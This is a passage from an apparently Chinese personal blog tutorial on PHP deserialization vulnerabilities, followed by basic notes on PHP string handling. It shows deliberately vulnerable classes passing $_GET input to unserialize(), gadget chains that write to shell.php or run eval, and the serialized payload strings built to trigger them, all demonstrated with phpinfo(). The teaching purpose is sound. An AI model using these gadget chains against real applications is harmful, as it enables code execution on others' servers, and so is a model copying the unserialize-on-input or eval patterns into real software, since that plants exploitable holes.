<p>基本的思路是，本地搭建好环境，通过 serialize() 得到我们要的序列化字符串，之后再传进去。通过源代码知，把对象中的test值赋为 “&lt;?php phpinfo(); &gt;”,再调用unserialize()时会通过__wakeup()把test的写入到shell.php中。为此我们写个php脚本：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>class virusday&#123;	</span><br><span class="line">    <span class="keyword">var</span> $test = <span class="string">'123'</span>;	</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;		</span><br><span class="line">        $fp = fopen(<span class="string">"shell.php"</span>,<span class="string">"w"</span>) ;		</span><br><span class="line">        fwrite($fp,<span class="keyword">$this</span>-&gt;test);		</span><br><span class="line">        fclose($fp);	</span><br><span class="line">    &#125;</span><br><span class="line">&#125;$class4 = <span class="keyword">new</span> virusday();</span><br><span class="line">$class4-&gt;test = <span class="string">"&lt;?php phpinfo(); ?&gt;"</span>;	</span><br><span class="line">$class4_ser = serialize($class4);	</span><br><span class="line">print_r($class4_ser);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>由此得到序列化结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:&quot;virusday&quot;:1:&#123;s:4:&quot;test&quot;;s:19:&quot;&lt;?php phpinfo(); ?&gt;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="其他Magic-function的利用"><a href="#其他Magic-function的利用" class="headerlink" title="其他Magic function的利用"></a>其他Magic function的利用</h4><p>但如果一次unserialize()中并不会直接调用的魔术函数，比如前面提到的<strong>construct()，是不是就没有利用价值呢？非也。类似于PWN中的ROP，有时候反序列化一个对象时，由它调用的</strong>wakeup()中又去调用了其他的对象，由此可以溯源而上，利用一次次的“gadget”找到漏洞点。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">creeper</span></span>&#123;	</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($test)</span></span>&#123;		</span><br><span class="line">        $fp = fopen(<span class="string">"shell.php"</span>,<span class="string">"w"</span>) ;		</span><br><span class="line">        fwrite($fp,$test);		</span><br><span class="line">        fclose($fp);	</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">virusday</span></span>&#123;	</span><br><span class="line">    <span class="keyword">var</span> $test = <span class="string">'123'</span>;	</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;		</span><br><span class="line">        $obj = <span class="keyword">new</span> creeper(<span class="keyword">$this</span>-&gt;test);	</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$class5 = $_GET[<span class="string">'test'</span>];</span><br><span class="line">print_r($class5);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">$class5_unser = unserialize($class5);</span><br><span class="line"><span class="keyword">require</span> <span class="string">"shell.php"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>这里我们给test传入构造好的序列化字符串后，进行反序列化时自动调用__wakeup()函数 ，从而在new creeper()会自动调用对象creeper中的 __construct()方法，从而把<code>&lt;?php phpinfo(); ?&gt;</code>写入到 shell.php中。</p>
<p>传参：?test=O:8:”virusday”:1:{s:4:”test”;s:19:&quot;&lt;?php phpinfo(); ?&gt;&quot;;}</p>
<h2 id="利用普通成员方法"><a href="#利用普通成员方法" class="headerlink" title="利用普通成员方法"></a>利用普通成员方法</h2><p>前面谈到的利用都是基于“自动调用”的magic function。但当漏洞/危险代码存在类的普通方法中，就不能指望通过“自动调用”来达到目的了。这时的利用方法如下，<strong>寻找相同的函数名，把敏感函数和类联系在一起</strong>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">virusday</span> </span>&#123;    </span><br><span class="line">    <span class="keyword">var</span> $test;    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;        </span><br><span class="line">        <span class="keyword">$this</span>-&gt;test = <span class="keyword">new</span> creeper1();    </span><br><span class="line">    &#125;    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;        </span><br><span class="line">        <span class="keyword">$this</span>-&gt;test-&gt;action();    </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">creeper1</span> </span>&#123;    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">action</span><span class="params">()</span> </span>&#123;        </span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"creeper1"</span>;    </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">creeper2</span> </span>&#123;    </span><br><span class="line">    <span class="keyword">var</span> $test2;    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">action</span><span class="params">()</span> </span>&#123;        </span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;test2);    </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$class6 = <span class="keyword">new</span> virusday();</span><br><span class="line">unserialize($_GET[<span class="string">'test'</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>本意上，new一个新的chybeta对象后，调用__construct()，其中又new了creeper1对象。在结束后会调用__destruct()，其中会调用action()，从而输出 creeper1。</p>
<p>下面是利用过程。构造序列化。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">virusday</span> </span>&#123;    </span><br><span class="line">    <span class="keyword">var</span> $test;    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;        </span><br><span class="line">        <span class="keyword">$this</span>-&gt;test = <span class="keyword">new</span> creeper2();    <span class="comment">#test变量指向creeper2的对象实例</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">creeper2</span> </span>&#123;    </span><br><span class="line">    <span class="keyword">var</span> $test2 = <span class="string">"phpinfo();"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="keyword">new</span> virusday());</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p>得到：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:&quot;virusday&quot;:1:&#123;s:4:&quot;test&quot;;O:7:&quot;creeper2&quot;:1:&#123;s:5:&quot;test2&quot;;s:10:&quot;phpinfo();&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure>



<p>传给index.php的test参数，利用成功</p>
<h4 id="toString魔术方法"><a href="#toString魔术方法" class="headerlink" title="toString魔术方法"></a>toString魔术方法</h4><p>其中特别说明一下第四点：</p>
<p>这个 __toString 触发的条件比较多，也因为这个原因容易被忽略，常见的触发条件有下面几种</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">(1)echo ($obj) &#x2F; print($obj) 打印时会触发</span><br><span class="line"></span><br><span class="line">(2)反序列化对象与字符串连接时 （.连接）</span><br><span class="line"></span><br><span class="line">(3)反序列化对象参与格式化字符串时（sprintf() 函数把格式化的字符串写入变量中。格式化其中的变量再返回已格式化的字符串）</span><br><span class="line"></span><br><span class="line">(4)反序列化对象与字符串进行&#x3D;&#x3D;比较时（PHP进行&#x3D;&#x3D;比较的时候会转换参数类型）</span><br><span class="line"></span><br><span class="line">(5)反序列化对象参与格式化SQL语句，绑定参数时（bind_param()）</span><br><span class="line"></span><br><span class="line">(6)反序列化对象在经过php字符串函数，如 strlen()、addslashes()时</span><br><span class="line"></span><br><span class="line">(7)在in_array()方法中，第一个参数是反序列化对象，第二个参数的数组中有toString返回的字符串的时候toString会被调用</span><br><span class="line"></span><br><span class="line">(8)反序列化的对象作为 class_exists() 的参数的时候</span><br></pre></td></tr></table></figure>







<h2 id="php字符串拼接"><a href="#php字符串拼接" class="headerlink" title="php字符串拼接"></a>php字符串拼接</h2><h3 id="字符串的表示"><a href="#字符串的表示" class="headerlink" title="字符串的表示"></a>字符串的表示</h3><p>PHP中字符串的表示可以用双引号，也可以用单引号，但是两者之间有些区别。</p>
<ul>
<li>字符串中有变量的时候，<strong>单引号仅输出变量名</strong>，而不是值：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="number">2</span> $color = <span class="string">"red"</span>;</span><br><span class="line"><span class="number">3</span> <span class="keyword">echo</span> <span class="string">"Roses are$color"</span>;</span><br><span class="line"><span class="number">4</span> <span class="keyword">echo</span> <span class="string">"&lt;br /&gt;"</span>;</span><br><span class="line"><span class="number">5</span> <span class="keyword">echo</span> <span class="string">'Roses are $color'</span>;</span><br><span class="line"><span class="number">6</span> <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Roses are red</span><br><span class="line">Roses are $color #注意此处只输出变量名</span><br></pre></td></tr></table></figure>



<ul>
<li>转义字符：</li>
</ul>
<p>　　　　“\t”  输出时就是制表符， 而‘\t’ 就是直接输出 \t 了。　　</p>
<p>　　　　在window下 “\r\n” 是表示换行。</p>
<ul>
<li>此外，在PHP中要输出一个换行的时候，只能用“<br>”，可能这也是它与HTML语言高度结合的结果吧</li>
</ul>
<h3 id="字符串的拼接（连接符）"><a href="#字符串的拼接（连接符）" class="headerlink" title="字符串的拼接（连接符）"></a>字符串的拼接（连接符）</h3><h3 id="php变量和字符串连接符——点（-）"><a href="#php变量和字符串连接符——点（-）" class="headerlink" title="php变量和字符串连接符——点（.）"></a>php变量和字符串连接符——点（.）</h3><p> 连接符——点，本身也是一种运算符。它真正的名字应该叫<strong>“字符运算符”</strong>。作用是把两个字符串连接起来。 </p>
<p><strong>echo 字符 . 变量 . 字符;</strong> </p>
<p>//点号把三个值连接成为一个，运行正常。</p>
<p>例：</p>
<p>1.字符串+变量+字符串</p>
<p><code>echo(&quot;&lt;!--&quot;.$result.&quot;--&gt;&quot;);</code></p>
<p>2.变量+变量<br><code>echo($result.$result);</code></p>
<p>3.字符串+变量<br><code>echo(&quot;a&quot;.$result);</code></p>
<p> 当然还有其他输出方式:print 以及printf（用于控制输出格式）。但是<strong>echo的输出速度是最快的</strong>。 </p>
<h3 id="字符串处理函数"><a href="#字符串处理函数" class="headerlink" title="字符串处理函数"></a>字符串处理函数</h3><p>PHP也提供与其他语言类似的字符串处理函数，常用的有：</p>
<p>chr() 　　　　　　　　  从指定的 ASCII 值返回字符。（注意不是charAt）</p>
<p>explode() 　　　　　　 把字符串打散为数组。</p>
<p>str_ireplace() 　　　　 替换字符串中的一些字符。（对大小写不敏感）</p>
<p>str_word_count() 　　计算字符串中的单词数。</p>
<p>strip_tags() 　　　　　剥去 HTML、XML 以及 PHP 的标签。</p>
<p>stripos() 　　　　　　 返回字符串在另一字符串中第一次出现的位置(大小写不敏感)</p>
<p>strlen()　　　　　　　  返回字符串的长度。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"><i class="fa fa-tag"></i> web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/08/des-aes/" rel="next" title="des-aes">
                <i class="fa fa-chevron-left"></i> des-aes
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/10/php%E9%9D%B6%E5%9C%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98/php%E9%9D%B6%E5%9C%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98/" rel="prev" title="php靶场漏洞分析实战">
                php靶场漏洞分析实战 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/user.jpg"
                alt="Virusday" />
            
              <p class="site-author-name" itemprop="name">Virusday</p>
              <p class="site-description motion-element" itemprop="description">学习的日常</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">51</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <!-- modify icon to fire by szw -->
                <i class="fa fa-history fa-" aria-hidden="true"></i>
                近期文章
              </div>
              <ul class="links-of-blogroll-list">
                
                
                  <li class="recent_posts_li">
                    <a href="/2021/01/19/hta%E5%85%8D%E6%9D%80/hta%E6%B5%85%E6%9E%90/" title="hta免杀/hta浅析" target="_blank">hta免杀/hta浅析</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/01/18/%E7%BD%91%E7%AB%99%E6%B8%97%E9%80%8Fgetshell%E6%80%BB%E7%BB%93/1/" title="网站渗透getshell总结/1" target="_blank">网站渗透getshell总结/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/01/08/%E5%8D%95%E7%82%B9%E7%99%BB%E5%BD%95%E7%88%86%E7%A0%B4%E5%9F%BA%E4%BA%8E%E5%8A%A0%E5%AF%86/1/" title="单点登录爆破基于加密/1" target="_blank">单点登录爆破基于加密/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/01/01/%E9%97%AE%E9%A2%98%E6%95%B4%E7%90%86/2/%E6%B5%81%E7%A8%8B%E6%80%BB%E7%BB%93/" title="问题整理/2/流程总结" target="_blank">问题整理/2/流程总结</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2020/12/24/%E9%97%AE%E9%A2%98%E6%95%B4%E7%90%86/1/" title="问题整理/1" target="_blank">问题整理/1</a>
                  </li>
                
              </ul>
            </div>
          
          
          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#php序列化杂记"><span class="nav-number">1.</span> <span class="nav-text">php序列化杂记</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-PHP的序列化和反序列化"><span class="nav-number">1.0.1.</span> <span class="nav-text">0x01 PHP的序列化和反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#概念"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">概念</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-为什么会产生反序列化漏洞？"><span class="nav-number">1.0.2.</span> <span class="nav-text">0x02 为什么会产生反序列化漏洞？</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP的魔法方法"><span class="nav-number">1.0.2.1.</span> <span class="nav-text">PHP的魔法方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用构造函数"><span class="nav-number">1.0.2.2.</span> <span class="nav-text">利用构造函数</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Magic-function"><span class="nav-number">1.0.2.2.1.</span> <span class="nav-text">Magic function</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用场景"><span class="nav-number">1.0.2.3.</span> <span class="nav-text">利用场景</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#wakeup-或-destruct"><span class="nav-number">1.0.2.3.1.</span> <span class="nav-text">__wakeup() 或__destruct()</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其他Magic-function的利用"><span class="nav-number">1.0.2.4.</span> <span class="nav-text">其他Magic function的利用</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用普通成员方法"><span class="nav-number">1.1.</span> <span class="nav-text">利用普通成员方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#toString魔术方法"><span class="nav-number">1.1.0.1.</span> <span class="nav-text">toString魔术方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php字符串拼接"><span class="nav-number">1.2.</span> <span class="nav-text">php字符串拼接</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#字符串的表示"><span class="nav-number">1.2.1.</span> <span class="nav-text">字符串的表示</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字符串的拼接（连接符）"><span class="nav-number">1.2.2.</span> <span class="nav-text">字符串的拼接（连接符）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php变量和字符串连接符——点（-）"><span class="nav-number">1.2.3.</span> <span class="nav-text">php变量和字符串连接符——点（.）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字符串处理函数"><span class="nav-number">1.2.4.</span> <span class="nav-text">字符串处理函数</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <!--
<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-id-card"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Virusday</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">63.2k</span>
  
</div>
-->


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Virusday</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>









        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
